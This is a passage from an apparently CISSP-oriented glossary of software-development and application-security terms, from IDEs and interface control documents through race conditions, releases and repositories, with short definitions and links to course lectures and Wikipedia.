A software suite providing comprehensive tools for software development and debugging. ## Footnote A software application that provides a comprehensive set of tools for developing, debugging, and testing software. An IDE typically includes a code editor, a debugger, and other tools for building and managing software projects. Examples of IDEs include Visual Studio, Eclipse, and Xcode. *For more information, view this lecture on [Software vulnerabilities and Attacks](https://courses.thorteaches.com/courses/take/cissp/lessons/19182134-software-vulnerabilities-and-attacks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Integrated_development_environment).*
100
# Define: Interface Control Document | (ICD)
A document specifying how different systems or components will communicate. ## Footnote A document that specifies the rules, protocols, and procedures for the communication between two systems, devices, or components. It is used in software development, project management, and system integration. Examples of interface control documents include a communication protocol specification, a system integration plan, and a data exchange agreement. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Interface_Control_Document).*
101
# Define: Intermediate Code
A low-level, abstract code generated by a compiler as part of the processing before machine code. ## Footnote Intermediate code, also known as intermediate language or bytecode, is a low-level, abstract code that a compiler generates from source code as an intermediary step before machine code. It allows for optimization and can be executed by a virtual machine, aiding in cross-platform compatibility. For example, Java compilers convert source code into Java bytecode, which the Java Virtual Machine (JVM) can execute on any platform. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Intermediate_representation).*
102
# Define: Interpreters
Software that executes source code line by line, translating it into executable instructions. ## Footnote Interpreters are software components that execute source code line by line, translating it into machine-executable instructions in real-time rather than compiling the code into machine language beforehand. This allows for immediate program execution but can result in slower performance compared to compiled languages. They are essential for scripting languages like Python, Ruby, and JavaScript. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Interpreter_(computing)).*
103
# Define: Unvalidated Redirects and Forwards
A security vulnerability allowing attackers to redirect users to malicious sites or steal sensitive information. ## Footnote A security flaw that allows attackers to redirect users to malicious websites or steal sensitive information. Understanding this flaw helps web application security teams prevent attackers from manipulating URLs and redirecting users to malicious sites. Examples include a phishing attack that uses a fake login page to steal user credentials or a ransomware attack that redirects users to a malicious website. *For more information, view this lecture on [OWASP 2021 - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4).*
104
# Define: IPPD
A systematic approach synchronizing product and process development for optimal performance. ## Footnote Integrated Product and Process Development (IPPD) is a systematic approach that synchronizes the development of products and their related processes to ensure optimal performance, cost-efficiency, and customer satisfaction. By fostering collaboration across diverse functional teams and integrating security considerations early on, IPPD aims to deliver high-quality products that meet stakeholder needs within the IT and cybersecurity domains.
105
# Define: IT Application
Software designed for specific tasks or functions, such as data processing or workflow management. ## Footnote An IT application refers to any software designed to fulfill specific functions for the user, such as data processing, communication, or workflow management. These applications vary widely in complexity and purpose, from office productivity suites to complex database management systems. Effective security and regular updates are vital to protect against vulnerabilities and ensure data integrity. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Application_software).*
106
# Define: Java Applets
Small programs once used within web browsers for interactive features, now largely replaced by modern web technologies. ## Footnote Java applets were small Java programs that could run in a web browser to provide interactive features on web pages. However, due to security concerns and the rise of alternative technologies, applets have become largely obsolete and are no longer supported by most web browsers. Modern web development practices utilize alternative technologies like HTML5, JavaScript, and WebAssembly for embedding interactive content. *For more information, view this lecture on [Web architecture and attacks](https://courses.thorteaches.com/courses/take/cissp/lessons/19148725-web-architecture-and-attacks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Java_applet).*
107
# Define: Java Network Launch Protocol | (JNLP)
A protocol for launching Java applets and applications from a web page, enabling them to run on a user's computer with security measures. ## Footnote A protocol that is used to launch Java applets and applications from a web page. It allows the applet or application to be downloaded and run on the user's computer, while also providing security measures to protect the user's system from malicious code. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Java_Web_Start#Java_Network_Launching_Protocol_(JNLP)).*
108
# Define: JavaScript
A programming language for adding interactivity and dynamic content to websites, executed by the web browser. ## Footnote A programming language used to create interactive and dynamic content on websites. It is executed by the web browser and allows for user input and real-time updates on a web page. It is used in web development and front-end web programming. Examples include a search bar or a form on a website. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/JavaScript).*
109
# Define: JSON | (JavaScript Object Notation)
JSON is a lightweight, human-readable data format commonly used for transferring information between web servers and clients, known for its simplicity and language independence. ## Footnote Structured as key-value pairs and arrays, JSON relies on text-based syntax derived from JavaScript. Popular across REST APIs, it replaces more verbose XML in many applications, enabling efficient data exchange. Security considerations include preventing JSON injection attacks and properly validating inputs. With broad support in numerous programming languages, JSON remains a standard for quick, interoperable communication in modern development. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/JSON).*
110
# Define: LDAP Injection Attack | (Lightweight Directory Access Protocol)
An attack exploiting web application vulnerabilities to manipulate LDAP queries and compromise directory services. ## Footnote An LDAP Injection Attack is a cyber-attack technique that exploits vulnerabilities in web applications that construct LDAP (Lightweight Directory Access Protocol) statements from user input without proper sanitization. Attackers can manipulate these queries to execute unauthorized commands or modify directory content. Measures such as input validation and prepared statements help protect against such attacks. *For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/LDAP_injection).*
111
# Define: Libraries | (Software)
Collections of pre-written code that can be used to develop new software applications, such as API libraries or UI component libraries. ## Footnote A collection of reusable software components that can be used to build or extend applications. It is used to improve the efficiency and maintainability of software development. Examples of software libraries include the Java API, the .NET Framework, and the Standard Template Library. *For more information, view this lecture on [SCA - Software Composition Analysis](https://courses.thorteaches.com/courses/take/cissp/lessons/54399265-new-2024-sca-software-composition-analysis). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Library_(computing)).*
112
# Define: Licensing Agreement
A contract outlining terms under which software can be used, specifying usage rights and restrictions. ## Footnote A contract between a software vendor and a user that specifies the terms and conditions for using the software. It is used to protect the intellectual property rights of the software vendor and ensure that the user complies with the specified terms and conditions. Examples include open-source and proprietary licensing agreements. *For more information, view this lecture on [Buying software from other companies](https://courses.thorteaches.com/courses/take/cissp/lessons/19182140-buying-software-from-other-companies). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_license_agreement).*
113
# Define: Lower Order Languages
Programming languages closer to machine code, providing direct hardware control. ## Footnote A class of programming languages that are closer to machine code or assembly language than to high-level programming languages. Lower-order languages provide limited abstraction from the hardware and are often used for tasks that require direct hardware manipulation or high performance. They give the programmer more control over the memory and processor but require a deeper understanding of the underlying computer architecture. Examples of lower-order languages include assembly language and machine language, which consist of instructions that are directly executed by the CPU. These languages are generally more difficult to write and maintain than higher-level languages, but they can offer greater efficiency and are essential for certain low-level programming tasks. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1).*
114
# Define: Machine Language
The native code understood by computer processors, used for low-level programming tasks. ## Footnote A set of instructions that a computer can execute directly without the need for translation. It is used in computer programming to write low-level code that can be run efficiently on a specific type of processor. Examples include x86 machine language for Intel-based processors and ARM machine language for ARM-based processors. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Machine_code).*
115
# Define: Machine Learning | (ML)
AI technology using algorithms to learn and adapt without explicit programming. ## Footnote A type of artificial intelligence that involves the use of algorithms and statistical models to enable computers to improve their performance on a specific task without being explicitly programmed. It is used in a variety of industries, such as finance, healthcare, and retail, to improve decision-making and automate processes. For example, a credit card company may use machine learning to detect fraudulent transactions. *For more information, view this lecture on [Artificial Intelligence (AI)](https://courses.thorteaches.com/courses/take/cissp/lessons/19182149-artificial-intelligence-ai). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Machine_learning).*
116
# Define: Maintenance Hook
A feature built into software for maintenance tasks, potentially posing a security risk if misused. ## Footnote A maintenance hook, traditionally known as a backdoor, is a method intentionally built into software by its creators that allows for direct access to perform administrative or maintenance tasks. While often used legitimately by developers or support teams, these can be considered security risks if discovered by attackers, as they may be exploited to gain unauthorized access to software or systems.
117
# Define: Middleware
Software that acts as an intermediary between different applications, facilitating communication and data management. ## Footnote A layer of software that facilitates communication and data management between different applications or components within a system. This software 'glue' enables interaction between disparate systems, acting as a bridge across different databases, networks, operating systems, or programming languages. In a secure environment, middleware must be properly configured and updated to prevent it from becoming a potential vulnerability or entry point for unauthorized access. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Middleware).*
118
# Define: Native Libraries
Pre-written code collections in low-level languages providing operations and functions for other software or applications. ## Footnote Collections of subroutines or classes typically written in a low-level language like C or C++ that provide a set of functions to perform a specific set of operations or compute tasks. They are directly compiled into machine code for the platform they are developed on, hence the term 'native'. They can be used by high-level languages or applications on the same platform for better performance or to access low-level resources.
119
# Define: Network Database Management Model
An approach for representing complex data relationships, now largely replaced by relational or non-relational models. ## Footnote The Network Database Management Model is a flexible approach for modeling complex data relationships where each record can have multiple parent and child relationships. Unlike the hierarchical database model, which restricts records to a single parent, it allows more versatile relationship mapping. However, this term is somewhat obsolete and is now mainly of historical interest, as contemporary databases typically use relational or non-relational models. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Network_database_model).*
120
# Define: Non-Functional Requirements
Criteria for a system's operation, like performance and security, that describe how it should work. ## Footnote The criteria that judge the operation of a system rather than specific behaviors, typically referring to aspects such as performance, reliability, and security. These factors describe how a system should work rather than what it should do and can be critical to the system's functionality, performance, and overall user satisfaction. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Non-functional_requirement).*
121
# Define: Non-Relational Database
A flexible database that stores data differently from traditional relational databases, used in big data projects. ## Footnote A type of database that does not use a traditional tabular structure to store data. It is used in big data and NoSQL projects to store and process large amounts of data in a flexible, scalable way. Examples include MongoDB, Cassandra, and HBase. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/NoSQL).*
122
# Define: Normalization
Organizing a database to minimize redundancy and dependency, improving data efficiency. ## Footnote The process of organizing a database to minimize redundancy and dependency. It is used in database design to improve the efficiency and organization of data. Examples include breaking up a large table into smaller, related tables and removing repeating data. *For more information, view this lecture on [Databases - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182105-databases-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_normalization).*
123
# Define: North-South APIs
APIs that manage connectivity between internal networks and external services or partners. ## Footnote These APIs enable connectivity between an organization's internal network and external entities, such as third-party services, partners, and customers. North-South API traffic is often subject to intense scrutiny by CISOs, as these APIs expose core business applications to the internet, necessitating stringent security controls to protect against external threats and unauthorized access.
124
# Define: NoSQL
Database systems that store and retrieve data differently than traditional relational databases. ## Footnote A category of database management systems that provides a mechanism for storage and retrieval of data, which is modeled in means other than the tabular relations used in relational databases. NoSQL databases are designed for distributed data stores with large data sets, and for scalable, high-performance operations. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/NoSQL).*
125
# Define: Null
A programming term indicating the absence of a value or a non-existent reference. ## Footnote In programming, null represents the absence of a value or a non-existent reference. In databases, a null value indicates missing or unknown data. It's crucial to handle null values properly to avoid runtime errors and maintain data integrity. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Null).*
126
# Define: Object
A data structure in object-oriented programming encapsulating data and behavior. ## Footnote The fundamental building blocks of applications built using object-oriented programming (OOP) methodologies. They encapsulate data and the methods that operate on this data within a single unit. This approach enhances code reusability and modularity, making applications easier to develop, maintain, and secure. *For more information, view this lecture on [Databases - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/36620229-databases-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object_(computer_science)).*
127
# Define: Object Code
Compiled program code that can be executed on a specific platform. ## Footnote The compiled version of a program written in a high-level programming language. It is used in software development to create an executable version of a program that can be run on a specific platform. Examples include a .exe file in Windows or a .dmg file on a Mac. *For more information, view this lecture on [Databases - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/36620229-databases-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object_code).*
128
# Define: Object Orientation
A programming approach modeling concepts as objects with data and behavior. ## Footnote A programming paradigm that uses objects to model real-world concepts and processes. It is used in software development to create modular, reusable code and improve the maintainability and extensibility of a system. Examples of object-oriented programming languages include Java and C++. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object-oriented_programming).*
129
# Define: Object Reuse
Using existing objects in new systems to save development time and resources. ## Footnote The practice of using pre-existing objects in a new application or system, rather than creating new ones from scratch. It is commonly used in software development to save time and resources. Examples include using a library of pre-made objects or reusing objects from a previous project.
130
# Define: Object-Oriented Database
A database system supporting object storage and manipulation. ## Footnote An object-oriented database (OODB) is a database management system (DBMS) that supports the storage and manipulation of objects as used in object-oriented programming. OODBs are designed to be compatible with the principles of object-oriented programming, allowing for the integration of complex data models with the advantages of database functionality, such as ACID (Atomicity, Consistency, Isolation, Durability) properties. *For more information, view these lectures on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1) and [Programming Concepts - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object_database).*
131
# Define: Object-Oriented Programming | (OOP)
A programming paradigm using objects to represent data and behavior. ## Footnote A programming paradigm that uses objects to model real-world concepts and processes. It is used in software development to create modular, reusable code and improve the maintainability and extensibility of a system. Examples of object-oriented programming languages include Java and C++. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object-oriented_programming).*
132
# Define: Object-Oriented System Development
Developing software using objects, classes, and inheritance. ## Footnote A method of software development where the programming and structuring of code is done using objects, classes, and inheritance. This approach promotes modular design, code reuse, and scalability. It also allows for better representation of real-world entities and relationships, making systems more intuitive and easier to design, develop, test, and maintain. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2).*
133
# Define: Object-Relational Database | (ORD)
A database system combining object and relational database features. ## Footnote An Object-Relational Database (ORD) is a database management system that combines features of object-oriented databases and traditional relational databases to support objects, classes, and inheritance in schemas and query language. ORDs enable complex data types and relationships while maintaining the rigorous data organization and querying power of relational systems. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object-relational_database).*
134
# Define: Open Source
Software with publicly available source code for collaborative development. ## Footnote Open source software is characterized by its openly available source code, which can be studied, modified, and distributed by anyone. This collaborative development model promotes innovation, transparency, and rapid problem-solving, often resulting in more secure and adaptable software solutions through community contributions. *For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Open-source_software).*
135
# Define: Open Web Application Security Project | (OWASP)
An organization providing resources on application security, including tools, documentation, and best practices. ## Footnote A not-for-profit entity that provides unbiased, practical information about application security. This project, supported by a community of corporations, educational organizations, and individuals, produces freely available articles, methodologies, documentation, tools, and technologies to help organizations create secure web applications. *For more information, view this lecture on [OWASP 2021 - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182115-owasp-part-1). For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/OWASP).*
136
# Define: Open-Source Software | (OSS)
Software with publicly accessible source code, allowing for inspection, modification, and enhancement by anyone. ## Footnote OSS is software with source code that anyone can inspect, modify, and enhance. It promotes collaboration and sharing since developers can access the source code to improve the software design or fix issues. OSS security depends on community involvement to identify and patch vulnerabilities promptly. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Open-source_software).*
137
# Define: Orphaned Software
Software no longer supported or updated by its developers, posing security risks. ## Footnote A program or application that's no longer supported or updated by its creators or maintainers. This can pose a serious risk as new vulnerabilities discovered in the software cannot be patched, potentially leaving systems susceptible to exploits. Organizations often replace orphaned software with supported alternatives to mitigate this risk. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Abandonware).*
138
# Define: Output Feedback
A cryptographic mode that turns a block cipher into a stream cipher. ## Footnote Output Feedback (OFB) is an encryption mode that transforms a block cipher into a stream cipher by using the previous output to generate a keystream. This method allows encryption of data in smaller increments, enhances error resistance, and minimizes error propagation, making it suitable for various real-time and sequential data encryption tasks. *For more information, view this lecture on [Symmetric encryption- Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19149624-symmetric-encryption-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#OFB).*
139
# Define: OWASP Top 10
The OWASP Top 10 is a widely recognized list of the most critical web application security risks, guiding developers and security teams in mitigation strategies. ## Footnote Updated by the Open Web Application Security Project, it highlights vulnerabilities such as broken access control, cryptographic failures, and injection flaws. Each entry includes risk factors and best practices for prevention, providing a practical baseline for secure coding. By raising awareness, the OWASP Top 10 helps organizations prioritize fixes, direct training, and improve overall web application defense against emerging threats and common exploits. *For more information, view this lecture on [OWASP 2021 - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182115-owasp-part-1). For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://owasp.org/Top10/).*
140
# Define: Packers
Programs that compress or encrypt executables to obfuscate code. ## Footnote Packers are software tools used to compress or encrypt executable files, thereby obscuring their code and making reverse engineering more challenging. They are commonly employed to reduce file size or protect proprietary software, though they are also misused by malicious actors to disguise malware and evade detection by security systems. *For more information, view this lecture on [Malware- Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/18684286-malware-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Executable_compression).*
141
# Define: Parameter Validation
Checking inputs to a system for correctness and security, preventing vulnerabilities like injection attacks. ## Footnote A security technique that checks the input of a system to ensure that it meets the required format and specifications. It is used to prevent malicious attacks that exploit input vulnerabilities, such as SQL injection and buffer overflows. Examples include input filtering and type checking. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Parameter_validation).*
142
# Define: Polymorphic/Polymorphism
A technique allowing code to change its characteristics while maintaining its malicious purpose. ## Footnote A technique that allows malicious code or software to change its characteristics while keeping its core purpose intact. This approach helps the code evade detection by security tools that look for specific signatures or patterns. Polymorphism is often used by viruses, worms, and other forms of malware to bypass security measures and persist undetected within a network or system. *For more information, view this lecture on [Malware- Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/18684054-malware-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Polymorphic_code).*
143
# Define: Portfolio
A collection of projects, programs, and operations managed together to achieve strategic objectives. ## Footnote A collection of projects, programs, sub-portfolios, and operations managed as a group to achieve strategic objectives. An organization's technology portfolio can include a range of items such as software applications, hardware, data resources, and network infrastructure. Managing these assets in a portfolio view allows organizations to evaluate their investments comprehensively, prioritize effectively, and make informed decisions based on overall strategic goals. *For more information, view this lecture on [Software development methodologies part 3.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620202-software-development-methodologies-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/IT_portfolio_management).*
144
# Define: Pre-production Model
Early versions of a product used for testing and validating features before mass production. ## Footnote A pre-production model refers to early versions of a product, which are created to test and validate design and functionality before full-scale production begins. In software development, it may include alpha or beta versions of a program. In manufacturing, it could be a prototype of a device. These models are essential for identifying potential issues and improving the final product.
145
# Define: Primary Key
A unique identifier distinguishing each record in a database table, ensuring data integrity and efficient retrieval. ## Footnote A unique identifier for a record in a database table. Each table has one primary key, which cannot have null values and must contain unique values. This ensures that each record in a table can be uniquely identified, providing a way to retrieve, update, or delete specific records efficiently. By enforcing uniqueness and integrity, the use of primary keys is vital for maintaining organized and efficient database systems. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or view this lecture on [Databases - part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182105-databases-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Primary_key).*
146
# Define: PRINCE2 | (Projects in a Controlled Environment)
A structured approach for effective project management, emphasizing controlled delivery of projects. ## Footnote PRINCE2 (Projects in a Controlled Environment) is a widely recognized process-based approach for effective project management. It is built upon seven principles, themes, and processes that guide the planning, execution, and closure of projects. PRINCE2 is used across various sectors, ensuring that project delivery is consistent, controlled, and aligned with specified objectives. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/PRINCE2).*
147
# Define: Privileged Applets
Java applets with additional permissions beyond the security sandbox, allowing greater system interaction. ## Footnote Privileged applets refer to Java applets that are granted additional permissions beyond the strict limitations of the Java security sandbox model. They can interact with the system in ways typical applets cannot, such as reading and writing local files or accessing system resources, provided the user grants the necessary permissions.
148
# Define: Procedural Programming
A programming paradigm focusing on executing instructions step-by-step to solve problems. ## Footnote A programming paradigm that focuses on the step-by-step execution of a sequence of instructions to solve a problem. It is used in a wide range of programming languages, such as C, Pascal, and Fortran, to create programs that follow a logical sequence of operations. Examples of procedural programming include calculating the area of a rectangle or sorting a list of numbers. *For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Procedural_programming).*
149
# Define: Program and Project Management Office | (PMO)
An entity that standardizes project-related governance and facilitates resource sharing. ## Footnote The Program and Project Management Office (PMO) is an organizational structure that standardizes the project-related governance processes and facilitates the sharing of resources, methodologies, tools, and techniques. The responsibilities of a PMO can range from providing project management support functions to direct management of a project. Examples include enterprise PMO, departmental PMO, and IT PMO. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Project_management_office).*
150
# Define: Programming Languages
Languages used to create instructions for computers to perform tasks and solve problems. ## Footnote Formal, human-readable languages used to create instructions for a computer to execute. They are used to develop a wide range of applications, from simple scripts to complex software systems. Examples of programming languages include Java, Python, and C++. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Programming_language).*
151
# Define: Project
A temporary endeavor undertaken to create a unique product, service, or result. ## Footnote A temporary effort that is undertaken to create a unique product, service, or result. It is used in various fields, such as engineering and marketing, to achieve specific objectives within a specified timeframe and budget. Examples include building a bridge, launching a new product, and organizing a conference. *For more information, view this lecture on [Software development methodologies part 3.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620202-software-development-methodologies-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Project).*
152
# Define: Project Portfolio
A collection of projects managed at an organizational level to align with strategic goals. ## Footnote A collection of projects that are aligned with an organization's strategic goals and objectives. It is used to prioritize, allocate resources, and monitor the progress of projects. Examples include a portfolio of IT projects, a portfolio of construction projects, and a portfolio of marketing projects. *For more information, view this lecture on [Software development methodologies part 3.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620202-software-development-methodologies-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Project_portfolio_management).*
153
# Define: Project Team
A group of individuals collaborating to achieve the objectives of a specific project. ## Footnote A group of individuals who are responsible for completing a specific project within an organization. It is used to bring together the necessary expertise and skills to achieve project goals. Examples include software development teams, construction teams, and marketing teams.
154
# Define: Prototyping
Creating preliminary versions of products or systems to test and refine their design and functionality. ## Footnote The process of creating a preliminary or working model of a product or system for the purpose of testing and evaluating its design and functionality. This is commonly used in the development of software and hardware products to ensure that the final product meets the desired specifications and requirements. Examples include paper prototypes and beta versions of software products. *For more information, view this lecture on [Software development methodologies part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182096-software-development-methodologies-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_prototyping).*
155
# Define: Public Domain Software
Software that is not copyrighted and freely available for use and modification by anyone. ## Footnote Software that is not protected by copyright and is freely available for use, modification, and distribution by anyone. Public domain software enables innovation and collaboration without the restrictions typical of licensed software. *For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Public-domain_software).*
156
# Define: Python
A high-level, interpreted programming language known for its clear syntax, readability, and suitability for a wide range of applications. ## Footnote A high-level, interpreted, and general-purpose programming language. It is used in various fields, such as web development, data science, and automation, to create efficient and scalable programs. Examples of Python applications include web servers, machine learning algorithms, and automation scripts. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Python_(programming_language)).*
157
# Define: Query-based Attacks
Cyber-attacks involving the manipulation of query processes to compromise databases or applications. ## Footnote A category of cyber-attacks that involve the manipulation or exploitation of query processes within databases or applications. Specific examples include SQL injection, where malicious SQL queries are inserted into user input fields to manipulate databases, and DDoS attacks, which may flood a server with excessive network protocol queries to disrupt service.
158
# Define: Race Condition
A situation where the behavior of a system depends on the sequence and timing of uncontrollable events, leading to unpredictable results. ## Footnote A situation in which multiple processes or threads are competing for the same resources, and the outcome depends on the order in which they are executed. It is a common issue in the field of computer science and can lead to unpredictable or incorrect behavior. Countermeasures include the use of locks and semaphores to prevent race conditions, the use of atomic operations to ensure sequential execution, and the use of concurrency control techniques to manage shared resources. *For more information, view this lecture on [Software vulnerabilities and Attacks.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182134-software-vulnerabilities-and-attacks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Race_condition).*
159
# Define: Rapid Application Development | (RAD)
A software development approach prioritizing rapid prototyping and iterative user feedback over strict planning. ## Footnote A software development methodology that emphasizes speed and flexibility over traditional planning and design processes. It is used to quickly prototype and iterate on software ideas. Examples of RAD include using agile development methodologies or using low-code platforms to quickly build applications. *For more information, view this lecture on [Software development methodologies part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182096-software-development-methodologies-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Rapid_application_development).*
160
# Define: Refactoring
The process of restructuring existing code without changing its external behavior to improve its readability and maintainability. ## Footnote The process of restructuring or reorganizing existing code while maintaining its functionality. This practice is used to enhance code readability, reduce complexity, improve source code maintainability, and optimize system efficiency. It also facilitates easier troubleshooting and upgradeability, helping in identifying potential vulnerabilities and ensuring code adheres to the latest coding standards. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Code_refactoring).*
161
# Define: Relational Database Management System | (RDBMS)
A system that stores data in tables with relationships between them, supporting structured queries and transactions. ## Footnote A type of database management system that uses a relational model to organize data into tables and establish relationships between them. It is used in database management and data analysis. Examples include MySQL, Microsoft SQL Server, and Oracle Database. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Relational_database_management_system).*
162
# Define: Relational Database Model
A structure for organizing data into tables of rows and columns, featuring relations among data entities. ## Footnote A data model that represents data as a set of formally described tables from which data can be accessed or reassembled in various ways without needing to reorganize the tables themselves. This model was conceived by E.F. Codd, and it forms the theoretical basis of relational databases. It uses a standard method to store and retrieve data and is widely used due to its simplicity, flexibility, and efficiency. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or view this lecture on [Databases - part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182105-databases-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Relational_model).*
163
# Define: Release
The deployment of software to production, including new features, updates, or patches, after successful testing and approval. ## Footnote Release in change management refers to the stage where tested and validated changes are implemented into the live environment. This phase includes managing the release schedule, ensuring all parties impacted are informed about the changes, and verifying the system functions as expected after the release. Effective release management requires careful oversight to ensure no new vulnerabilities are introduced and existing security controls continue to function as intended in the changed environment. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_release_life_cycle).*
164
# Define: Release Identifier
A label indicating the version of a software release, often consisting of numbers that denote the iteration of development or updates. ## Footnote A label, often consisting of numbers and potentially letters, which denotes the version of a software release. This identifier helps to track the sequential development, enhancements, and fixes in software. It provides clarity and version control for developers and users, distinguishing between different stages of software development, like alpha, beta, and final releases.
165
# Define: Repository
A centralized location for storing and managing data, such as version-controlled code repositories for software development. ## Footnote A central location in which data is stored and managed. In terms of software development, it's often used to manage and store different versions of code files. A repository can be local to a user's machine, or it can be a storage space on a server or on the cloud. Repositories are crucial in maintaining data integrity, version control, and facilitating collaboration among multiple users or teams. *For more information, view this lecture on [Software development methodologies part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620216-software-development-methodologies-part-4). Or view this lecture on [Digital signatures.](https://courses.thorteaches.com/courses/take/cissp/lessons/19149728-digital-signatures). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Repository).*
166
# Define: Schema
